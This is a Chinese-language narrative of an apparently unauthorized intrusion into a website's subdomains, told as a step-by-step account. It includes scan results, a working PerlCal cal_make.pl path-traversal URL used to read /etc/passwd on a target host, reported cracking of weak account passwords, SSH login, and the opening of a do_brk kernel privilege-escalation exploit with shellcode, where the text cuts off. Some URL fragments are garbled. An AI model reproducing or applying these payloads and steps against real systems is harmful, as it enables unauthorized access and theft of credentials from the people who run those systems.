废话不说,
记一次渗透入侵
。开工C:\Documents and Settings\Administrator>ping www.xxx.com
Pinging www.xxx.com [192.168.0.252] with 32 bytes of data:
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Ping statistics for 192.168.0.252:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
文章中IP为假的 在这里不公布真正IP
看TTL的返回信息判断系统应该不是真的 现在可以改这个
先扫描他看看吧
结果只开了 21 22 80
看来成功率不算打 FTP并没有若口令 80也没什么信息
看来了他站里 发现分有bbs.xxx.com 和 news.xxx.com 而且IP都不一样 看来想办法渗透了。
首先去bbs.xxx.com看看 用的程序似乎是绿盟那样子的 呵呵 似乎没什么漏洞 先放边上。
看看服务器开的端口情况
开了 21 22 80 也没什么漏洞
在看看news.xxx.com
经过扫描 判断服务器应该是 NT/2000
21 80 389 1002 3389
基本上也没什么漏洞 21 没若口令 这个是IIS的 检查了一便也没什么漏洞 389 也没什么用 3389 不可能有输入法吧登陆看看系统
2000server的
news.xxx.com用的程序是asp的 想到了SQL注入。不过彻底查看了一下 所有的都过滤了。
有点郁闷了
jswz.xxx.com
也是一个分页 不过这个另我非常的意外 用的是cgi的 系统是linux
21 22 80
扫了一下有个漏洞
cal_make.pl 看名字有点熟悉 看了一下 不过一直没想起来62516f599cpRDctT
去了国外的几个站 终于发现了~~~
Name : PerlCal
About : cal_make.pl of the PerlCal script. may allow remote users(website visitors) to view any file on a webserver
(dependingon the user the webserver is running on).
Exploit:
_make.pl?\" target=_blank>http://www.VULNERABLE.com/cgi-bin/cal_make.pl?\
p0=../../../../../../../../../../../../etc/passwd%00
by: stan (stan@whizkunde.org)
呵呵 感谢hack.co.za
在浏览器地址栏输入
_make.pl?p0=../../../../../../../../../../../../../etc/passwd%00" target=_blank>http://www.xxx.edu/cgi-bin/perlcal/cal_make.pl?p0=../../../../../../../../../../../../../etc/passwd%00
好多用户信息 不过这是一个shadow过了passwd 好不容易的机会 不能放弃!
想办法 跑这些用户吧~~~
提炼用户名 希望有弱口令
提炼过程大家参考一些资料去吧
一共20多个用户 跑出来了2个 哈哈,
电脑资料
《记一次渗透入侵》(https://www.unjs.com)。。~~用SSH登陆~
权限似乎非常低
用第二个试试
哎 还是一样
看看提升权限吧~~
经过一番折腾 100%确定是rh73 内核Linux kernel 2.4
用do_brk的益出~
#include
#include
#include
char hellc0de[] =
"\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b